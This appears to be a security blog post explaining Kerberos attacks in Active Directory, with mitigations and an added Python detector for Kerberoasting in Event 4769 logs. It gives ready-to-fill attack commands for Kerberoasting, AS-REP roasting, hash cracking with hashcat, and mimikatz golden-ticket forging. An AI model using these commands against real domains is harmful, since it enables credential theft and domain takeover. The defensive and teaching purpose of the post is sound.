Kerberos Attacks & Mitigations


👉🏻 What are Kerberos Attacks?

Kerberos is the predominant authentication protocol in Microsoft Active Directory, replacing the older NTLM (New Technology LAN Manager). It offers enhanced security by using tickets for authentication. Domain users authenticate to the Key Distribution Center (KDC) and its Authentication Service (AS), which typically run on domain controllers.

👉🏻 What topics are covered in the document?

  • Kerberos Terminology
  • Process Overview
  • Golden Tickets
  • Silver Tickets
  • Kerberoasting
  • AS-REP Roasting
  • Mitigations for all Attacks

Practice-Verified Commands and Codes

1. Kerberoasting Attack

Use `Impacket`’s `GetUserSPNs.py` to extract service account hashes:

python3 GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD> -outputfile hashes.txt 

Crack the extracted hashes using `hashcat`:

hashcat -m 13100 hashes.txt /path/to/wordlist.txt 

2. Golden Ticket Attack

Generate a Golden Ticket using `mimikatz`:

mimikatz # kerberos::golden /admin:Administrator /domain:<DOMAIN> /sid:<SID> /krbtgt:<KRBTGT_HASH> /ptt 

Verify the ticket:

klist 

3. AS-REP Roasting

Use `Rubeus` to request AS-REP hashes:

Rubeus.exe asreproast /user:<USER> /format:hashcat /outfile:asrep_hashes.txt 

Crack the hashes with `hashcat`:

hashcat -m 18200 asrep_hashes.txt /path/to/wordlist.txt 

4. Mitigation Commands

  • Enable Kerberos auditing:
    auditpol /set /subcategory:"Kerberos Service Ticket Operations" /success:enable /failure:enable 
    
  • Restrict service account permissions (here, by clearing the trusted-for-delegation flag):
    Set-ADAccountControl -Identity <SERVICE_ACCOUNT> -TrustedForDelegation $false 
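
With the auditing setting above enabled, domain controllers log Event ID 4769 for each service ticket request. The Python code below is an added example, not code from the original post or from any tool it names. It screens such records for the Kerberoasting pattern: one account requesting RC4 (0x17) tickets for several user-backed services within a short window. The field names follow the 4769 event; the `time` key, the sample records and the thresholds are constructed assumptions.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the ticket type hashcat mode 13100 works on

def ev(t, user, service, etype, status="0x0"):
    """Build one constructed record using Event ID 4769 field names.
    `time` (seconds) is an assumed stand-in for the event timestamp."""
    return {"time": t, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status}

# Constructed sample data, not taken from a real domain controller.
SAMPLE_EVENTS = [
    ev(0, "jdoe@CORP.EXAMPLE", "svc_sql", "0x17"),
    ev(2, "jdoe@CORP.EXAMPLE", "svc_web", "0x17"),
    ev(3, "jdoe@CORP.EXAMPLE", "FILESRV01$", "0x17"),   # machine account
    ev(5, "jdoe@CORP.EXAMPLE", "svc_backup", "0x17"),
    ev(9, "asmith@CORP.EXAMPLE", "svc_sql", "0x12"),    # AES256 ticket
    ev(100, "bkim@CORP.EXAMPLE", "svc_sql", "0x17"),
    ev(700, "bkim@CORP.EXAMPLE", "svc_web", "0x17"),    # spread over time
    ev(1300, "bkim@CORP.EXAMPLE", "svc_backup", "0x17"),
    ev(1301, "bkim@CORP.EXAMPLE", "svc_hr", "0x17", status="0x6"),  # failed
]

def flag_kerberoast_candidates(events, min_services=3, window=60):
    """Return {account: [services]} for accounts that obtained RC4 tickets
    for at least `min_services` distinct services within `window` seconds."""
    per_account = defaultdict(list)
    for e in events:
        if int(e["Status"], 16) != 0:
            continue  # failed request, no ticket was issued
        if int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue  # AES tickets are the expected case on modern domains
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue  # machine accounts and krbtgt are not user-SPN targets
        per_account[e["TargetUserName"]].append((e["time"], svc))
    flagged = {}
    for account, reqs in per_account.items():
        reqs.sort()
        best = set()
        for i, (t0, _) in enumerate(reqs):  # window starting at each request
            seen = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_services:
            flagged[account] = sorted(best)
    return flagged

if __name__ == "__main__":
    print(flag_kerberoast_candidates(SAMPLE_EVENTS))
```

Tune `min_services` and `window` against a baseline of normal ticket requests in your own domain before alerting on the result.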
    

What Undercode Say

Kerberos remains a cornerstone of secure authentication in Active Directory environments, but its complexity and widespread use make it a prime target for attackers. Understanding the mechanics of Kerberos attacks, such as Golden Tickets, Silver Tickets, Kerberoasting, and AS-REP Roasting, is crucial for defenders. Mitigation strategies include enforcing strong password policies, enabling auditing, and restricting service account permissions.

By mastering these techniques and commands, you can better secure your environment against Kerberos-based threats. Always stay updated with the latest security patches and best practices to mitigate evolving attack vectors.
